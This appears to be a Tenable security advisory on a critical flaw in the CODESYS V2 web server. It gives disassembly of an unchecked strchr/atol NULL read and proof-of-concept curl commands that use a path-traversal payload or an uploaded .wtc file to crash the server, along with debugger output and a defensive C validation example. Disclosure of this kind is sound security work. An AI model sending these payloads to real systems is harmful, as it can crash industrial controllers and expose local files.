A memory read access violation can occur when the web server processes a message starting with |6:
.text:00407637     push    3Bh                     ; ';'
.text:00407639     mov     ecx, [ebp+arg_psLine]
.text:0040763C     push    ecx
.text:0040763D     call    _strchr
.text:00407642     add     esp, 8
.text:00407645     add     eax, 1                  ; returned pointer not
.text:00407645                                     ; checked for NULL
.text:00407648     mov     [ebp+psSemiColon], eax
.text:0040764B     mov     edx, [ebp+psLine]
.text:0040764E     push    edx
.text:0040764F     call    _atol
.text:00407654     add     esp, 4
.text:00407657     mov     [ebp+var_4], eax
.text:0040765A     mov     eax, [ebp+psSemiColon]  ; NULL + 1
.text:0040765A                                     ; read access violation !
.text:0040765D     push    eax
.text:0040765E     call    _atol
The vulnerability is triggered when processing unexpected file contents as part of message handling. An unauthenticated remote attacker can leverage a path traversal in the file extension field of the message to force the server to process the contents of an arbitrary file on the local file system. This can crash the web server or the CODESYS Control runtime system:
curl -d '|6|a|ext\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini|3|4|5|6|' http://<codesys_v2_web_server>:8080/

(1eec.20e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe
eax=00000000 ebx=003f1000 ecx=00431a5a edx=00000001 esi=0041de60 edi=0041de60
eip=0041bfdb esp=0014cb48 ebp=0014cb5c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
webserver+0x1bfdb:
0041bfdb 8a02            mov     al,byte ptr [edx]          ds:0023:00000001=??
Alternatively, the attacker can upload a .wtc file and force the web server to process the file contents:
curl -d $'|3|file0.wtc|file_content\n|' http://<codesys_v2_web_server>:8080/
curl -d '|6|file|wtc|3|4|5|6|' http://<codesys_v2_web_server>:8080/

(1ee0.1828): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe
eax=00000000 ebx=00224000 ecx=00431a5a edx=00000001 esi=0041de60 edi=0041de60
eip=0041bfdb esp=0014cb48 ebp=0014cb5c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
webserver+0x1bfdb:
0041bfdb 8a02            mov     al,byte ptr [edx]          ds:0023:00000001=??
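Item 7 combines two trust-boundary failures: the name and extension fields of the |6 message are used to build a file path without rejecting traversal sequences, and the lines of whatever file that path resolves to are parsed with strchr(';') followed by atol on the pointer plus one, with no NULL check, so a line without ';' makes the server read from address 1. As an added C example (not the server's code), the following restricts both fields to a single safe path component before joining them under the web root, and treats the file's lines as untrusted input. The "<webroot>/<name>.<ext>" layout and the web root location are assumptions based on the message format shown above.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Accept only one path component made of [A-Za-z0-9_-]. Because '.' is
 * excluded, ".." cannot appear, and neither '/' nor '\\' can reach the
 * path builder no matter how the extension field is written. */
static int is_safe_component(const char *s)
{
    if (s == NULL || *s == '\0' || strlen(s) > 64)
        return 0;
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && *s != '_' && *s != '-')
            return 0;
    return 1;
}

/* Build <webroot>/<name>.<ext> from validated fields only (layout assumed
 * from the |6 message above). Returns 0 and fills out, or -1 if a field
 * fails validation or the path does not fit. */
static int build_wtc_path(const char *webroot, const char *name, const char *ext,
                          char *out, size_t out_len)
{
    if (!is_safe_component(name) || !is_safe_component(ext))
        return -1;
    int n = snprintf(out, out_len, "%s/%s.%s", webroot, name, ext);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Parse one "<num>;<num>" line of the file. The server does strchr(';')
 * and atol(ptr + 1) with no NULL check; a win.ini line or the uploaded
 * "file_content" line has no ';' and the read lands at address 1. Here a
 * missing delimiter, or a field that is not a number, is reported. */
static int parse_pair_line(const char *line, long *a, long *b)
{
    const char *semi = strchr(line, ';');
    char *end;
    if (semi == NULL)
        return -1;
    *a = strtol(line, &end, 10);
    if (end == line)
        return -1;
    *b = strtol(semi + 1, &end, 10);
    if (end == semi + 1)
        return -1;
    return 0;
}

/* Demonstration helper: 1 if the joined path equals expect, else 0
 * (including when the fields are refused). */
static int path_builds_to(const char *name, const char *ext, const char *expect)
{
    char path[256];
    if (build_wtc_path("/srv/webroot", name, ext, path, sizeof path) != 0)
        return 0;
    return strcmp(path, expect) == 0;
}

/* Demonstration helper: sum of the two numbers on a line, or -1 if the
 * line is malformed. */
static long pair_sum(const char *line)
{
    long a, b;
    return parse_pair_line(line, &a, &b) == 0 ? a + b : -1;
}

int main(void)
{
    const char *traversal = "ext\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini";
    printf("ext \"wtc\" safe:        %d\n", is_safe_component("wtc"));
    printf("traversal ext safe:    %d\n", is_safe_component(traversal));
    printf("path(file, wtc):       %s\n",
           path_builds_to("file", "wtc", "/srv/webroot/file.wtc") ? "/srv/webroot/file.wtc" : "refused");
    printf("line \"3;4\":            %ld\n", pair_sum("3;4"));
    printf("line \"file_content\":   %ld (rejected)\n", pair_sum("file_content"));
    return 0;
}
```

The allow-list on the component is deliberately stricter than "reject ..": it also keeps out drive letters, separators of either style and NUL-adjacent tricks, and it leaves the server with no reason to canonicalise the resulting path at all.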
Solution
Additional References
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Risk Information

Credit: Tenable Research
CVSSv3 Base / Temporal Score: 9.8 / 8.8
Affected Products: All variants of the CODESYS runtime system prior to version V1.1.9.22 are affected
Risk Factor: Critical